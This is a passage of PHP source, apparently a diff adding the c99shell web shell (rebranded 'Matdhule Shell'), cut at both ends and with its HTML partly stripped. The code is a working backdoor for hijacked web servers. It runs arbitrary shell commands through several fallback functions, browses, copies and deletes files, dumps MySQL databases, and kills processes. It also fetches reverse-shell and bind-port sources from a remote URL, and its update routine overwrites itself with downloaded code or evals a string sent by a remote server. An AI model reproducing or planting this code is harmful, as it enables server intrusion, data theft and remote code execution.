"#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/ Next code isn't for editing \/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = TRUE) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo ""; + if ($tbl_struct) + { + echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



     
    Fields:
    "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» ".$name."
    ";} + echo "
    "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "ON (secure)"; +} +else {$safemode = FALSE; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} +else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><?php echo getenv("HTTP_HOST"); ?> - c99shell

    !Matdhule Shell v. !

    Software:  

    uname -a: ",1); ?> 

    ",1);} else {echo get_current_user();} ?> 

    Safe-mode: 

    ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; + $i++; +} +echo "   "; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = FALSE; + $wdt = "[ Read-Only ]"; + echo "".view_perms_color($d).""; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "
    Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; +} +echo "
    "; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "".$letter."";} + $letters .= " ] "; + } + } + if (!empty($letters)) {echo "Detected drives: ".$letters."
    ";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} +echo "


    "; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
    ".$donated_html."

    ";} +echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode(" ",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i])."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode(" ",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo ""; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "
    "; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?>

    Attention! SQL-Manager is NOT ready module! Don't reports bugs.

    "; + if (!$sql_sock) {?>"; + } + echo "
    SQL Manager:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "
    i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  •  Please, fill the form:
    UsernamePassword Database 
    HostPORT
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>
    Home

    Please, select database
    "; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
